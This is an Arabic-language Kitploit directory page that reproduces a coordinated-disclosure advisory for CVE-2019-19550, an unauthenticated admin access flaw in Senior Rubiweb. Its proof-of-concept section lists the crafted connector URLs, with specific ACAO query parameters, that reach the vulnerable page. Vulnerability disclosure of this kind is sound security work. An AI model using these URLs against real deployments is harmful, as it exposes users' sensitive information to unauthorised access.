Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-19550 — استغلال إثبات المفهوم لـ CVE-2019-19550، وهو تجاوز للمصادقة عن بُعد في Senior Rubiweb 6.2.34.28/37، مما يتيح وصولاً غير مصرح به للمسؤول إلى معلومات حساسة عبر عناوين URL معدّة. | Kitploit
أدوات/GitHubGitHub/underprotection/cve-2019-19550
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubunderprotection/cve-2019-19550

CVE-2019-19550

استغلال إثبات المفهوم لـ CVE-2019-19550، وهو تجاوز للمصادقة عن بُعد في Senior Rubiweb 6.2.34.28/37، مما يتيح وصولاً غير مصرح به للمسؤول إلى معلومات حساسة عبر عناوين URL معدّة.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
2منذ 6 سنواتلم تتم المراجعة بعد

CVE-2019-19550


[الوصف]

تجاوز المصادقة عن بُعد في Senior Rubiweb 6.2.34.28 و 6.2.34.37 يتيح وصول المدير إلى المعلومات الحساسة للمستخدمين المتأثرين باستخدام الإصدارات الضعيفة. يحتاج المهاجم فقط إلى توفير عنوان URL الصحيح.


[التواريخ الهامة]

  • الإعلان (للبائع): 2019-12-02
  • تاريخ الإفصاح العام: 2020-01-30

[نوع الثغرة]

التحكم في الوصول غير صحيح


[بائع المنتج]

Senior


[قاعدة كود المنتج المتأثر]

  • Rubiweb - 6.2.34.37
  • Rubiweb - 6.2.34.28
  • الإصدارات الأخرى قد تتأثر، خاصة في نفس العائلة (لم يتم اختبارها بعد)

[المكون المتأثر]

Rubiweb


[نوع الهجوم]

عن بُعد


[تأثير الإفصاح عن المعلومات]

صحيح


[نواقل الهجوم]

الوصول إلى المعلومات الحساسة متاح للجمهور دون متطلبات خاصة (فقط URI الصحيح)


[هل أكد البائع أو اعترف بالثغرة؟]

صحيح


[PoC - إثبات المفهوم]

  1. حاول ببساطة الاتصال بالبوابة المصادق عليها لتأكيد وجود وإصدار المنتج المتأثر:
    • hXXp://subdomain.customer.tld:8080/rubiweb/
  2. الوصول إلى الصفحة الضعيفة (مدير بدون مصادقة):
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU

[المكتشف]

Mauricio Santos (R&D UnderProtection) و Hesron Hori (R&D UnderProtection)


[شكر وتقدير]

Senior - فريق أمن المعلومات لدى البائع الذي تعاون للإفصاح المنسق


[المرجع]

  • https://www.underprotection.com.br
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm#central-de-configuracao/CfgWebApplicationsForm.htm%23CfgWebApplicationsForm_edtUserName
تنزيل الأداة